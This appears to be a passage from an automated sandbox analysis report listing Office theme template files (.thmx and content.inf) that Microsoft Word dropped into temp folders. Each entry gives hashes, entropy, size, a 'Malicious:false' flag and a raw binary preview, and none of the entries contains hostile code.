                                                                                                                                                SHA-512:491B36AC6D4749F7448B9A3A6E6465E8D97FB30F33EF5019AF65660E98F4570711EFF5FC31CBB8414AD9355029610E6F93509BC4B2FB6EA79C7CB09069DE7362
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .W.o.o.d._.T.y.p.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7989.tmp\Berlin.thmx

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):976001
                                                                                                                                                Entropy (8bit):7.791956689344336
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                                                                                                                                MD5:9E563D44C28B9632A7CF4BD046161994
                                                                                                                                                SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                                                                                                                SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                                                                                                                                SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7989.tmp\content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):278
                                                                                                                                                Entropy (8bit):3.5270134268591966
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXa3Y1kRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyt1mymD0wbnKNAH/lMz1
                                                                                                                                                MD5:327DA4A5C757C0F1449976BE82653129
                                                                                                                                                SHA1:CF74ECDF94B4A8FD4C227313C8606FD53B8EEA71
                                                                                                                                                SHA-256:341BABD413AA5E8F0A921AC309A8C760A4E9BA9CFF3CAD3FB2DD9DF70FD257A6
                                                                                                                                                SHA-512:9184C3FB989BB271B4B3CDBFEFC47EA8ABEB12B8904EE89797CC9823F33952BD620C061885A5C11BBC1BD3978C4B32EE806418F3F21DA74F1D2DB9817F6E167E
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.e.r.l.i.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7B30.tmp\Droplet.thmx

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1750795
                                                                                                                                                Entropy (8bit):7.892395931401988
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                                                                                                                                MD5:529795E0B55926752462CBF32C14E738
                                                                                                                                                SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                                                                                                                SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                                                                                                                SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7B30.tmp\content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):280
                                                                                                                                                Entropy (8bit):3.528155916440219
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXcmlDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyMmloymD0wbnKNAH/lMz1
                                                                                                                                                MD5:AA7B919B21FD42C457948DE1E2988CB3
                                                                                                                                                SHA1:19DA49CF5540E5840E95F4E722B54D44F3154E04
                                                                                                                                                SHA-256:5FFF5F1EC1686C138192317D5A67E22A6B02E5AAE89D73D4B19A492C2F5BE2F9
                                                                                                                                                SHA-512:01D27377942F69A0F2FE240DD73A1F97BB915E19D3D716EE4296C6EF8D8933C80E4E0C02F6C9FA72E531246713364190A2F67F43EDBE12826A1529BC2A629B00
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.r.o.p.l.e.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7B41.tmp\Gallery.thmx

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1091485
                                                                                                                                                Entropy (8bit):7.906659368807194
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                                                                                                                                MD5:2192871A20313BEC581B277E405C6322
                                                                                                                                                SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                                                                                                                SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                                                                                                                SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7B41.tmp\content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):280
                                                                                                                                                Entropy (8bit):3.5301133500353727
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXp2pRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyZ2vymD0wbnKNAH/lMz1
                                                                                                                                                MD5:1C5D58A5ED3B40486BC22B254D17D1DD
                                                                                                                                                SHA1:69B8BB7B0112B37B9B5F9ADA83D11FBC99FEC80A
                                                                                                                                                SHA-256:EBE031C340F04BB0235FE62C5A675CF65C5CC8CE908F4621A4F5D7EE85F83055
                                                                                                                                                SHA-512:4736E4F26C6FAAB47718945BA54BD841FE8EF61F0DBA927E5C4488593757DBF09689ABC387A8A44F7C74AA69BA89BEE8EA55C87999898FEFEB232B1BA8CC7086
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .G.a.l.l.e.r.y...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7B71.tmp\Savon.thmx

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1204049
                                                                                                                                                Entropy (8bit):7.92476783994848
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                                                                                                                                MD5:FD5BBC58056522847B3B75750603DF0C
                                                                                                                                                SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                                                                                                                SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                                                                                                                SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7B71.tmp\content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):276
                                                                                                                                                Entropy (8bit):3.5364757859412563
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXARkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnywMymD0wbnKNAH/lMz1
                                                                                                                                                MD5:CD465E8DA15E26569897213CA9F6BC9C
                                                                                                                                                SHA1:9EA9B5E6C9B7BF72A777A21EC17FD82BC4386D4C
                                                                                                                                                SHA-256:D4109317C2DBA1D7A94FC1A4B23FA51F4D0FC8E1D9433697AAFA72E335192610
                                                                                                                                                SHA-512:869A42679F96414FE01FE1D79AF7B33A0C9B598B393E57E0E4D94D68A4F2107EC58B63A532702DA96A1F2F20CE72E6E08125B38745CD960DF62FE539646EDD8D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.a.v.o.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7DB6.tmp\Damask.thmx

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2218943
                                                                                                                                                Entropy (8bit):7.942378408801199
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                                                                                                                                MD5:EE33FDA08FBF10EF6450B875717F8887
                                                                                                                                                SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                                                                                                                SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                                                                                                                SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7DB6.tmp\content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):278
                                                                                                                                                Entropy (8bit):3.544065206514744
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXCARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyy6ymD0wbnKNAH/lMz1
                                                                                                                                                MD5:06B3DDEFF905F75FA5FA5C5B70DCB938
                                                                                                                                                SHA1:E441B94F0621D593DC870A27B28AC6BE3842E7DB
                                                                                                                                                SHA-256:72D49BDDE44DAE251AEADF963C336F72FA870C969766A2BB343951E756B3C28A
                                                                                                                                                SHA-512:058792BAA633516037E7D833C8F59584BA5742E050FA918B1BEFC6F64A226AB3821B6347A729BEC2DF68BB2DFD2F8E27947F74CD4F6BDF842606B9DEDA0B75CC
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.a.m.a.s.k...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7E24.tmp\Slate.thmx

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2357051
                                                                                                                                                Entropy (8bit):7.929430745829162
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                                                                                                                                MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                                                                                                                SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                                                                                                                SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                                                                                                                SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7E24.tmp\content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):276
                                                                                                                                                Entropy (8bit):3.516423078177173
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUX7kARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny5ymD0wbnKNAH/lMz1
                                                                                                                                                MD5:5402138088A9CF0993C08A0CA81287B8
                                                                                                                                                SHA1:D734BD7F2FB2E0C7D5DB8F70B897376ECA935C9A
                                                                                                                                                SHA-256:5C9F5E03EEA4415043E65172AD2729F34BBBFC1A1156A630C65A71CE578EF137
                                                                                                                                                SHA-512:F40A8704F16AB1D5DCD861355B07C7CB555934BB9DA85AACDCF869DC942A9314FFA12231F9149D28D438BE6A1A14FCAB332E54B6679E29AD001B546A0F48DE64
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.l.a.t.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD8191.tmp\Main_Event.thmx

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2924237
                                                                                                                                                Entropy (8bit):7.970803022812704
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                                                                                                                                MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                                                                                                                SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                                                                                                                SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                                                                                                                SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD8191.tmp\content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):286
                                                                                                                                                Entropy (8bit):3.5434534344080606
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXIc5+RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny4KcymD0wbnKNAH/lMz1
                                                                                                                                                MD5:C9812793A4E94320C49C7CA054EE6AA4
                                                                                                                                                SHA1:CC1F88C8F3868B3A9DE7E0E5F928DBD015234ABA
                                                                                                                                                SHA-256:A535AE7DD5EDA6D31E1B5053E64D0D7600A7805C6C8F8AF1DB65451822848FFC
                                                                                                                                                SHA-512:D28AADEDE0473C5889F3B770E8D34B20570282B154CD9301932BF90BF6205CBBB96B51027DEC6788961BAF2776439ADBF9B56542C82D89280C0BEB600DF4B633
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.a.i.n._.E.v.e.n.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD8192.tmp\Mesh.thmx

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3078052
                                                                                                                                                Entropy (8bit):7.954129852655753
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                                                                                                                                MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                                                                                                                SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                                                                                                                SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                                                                                                                SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                                                                                                                Malicious:false
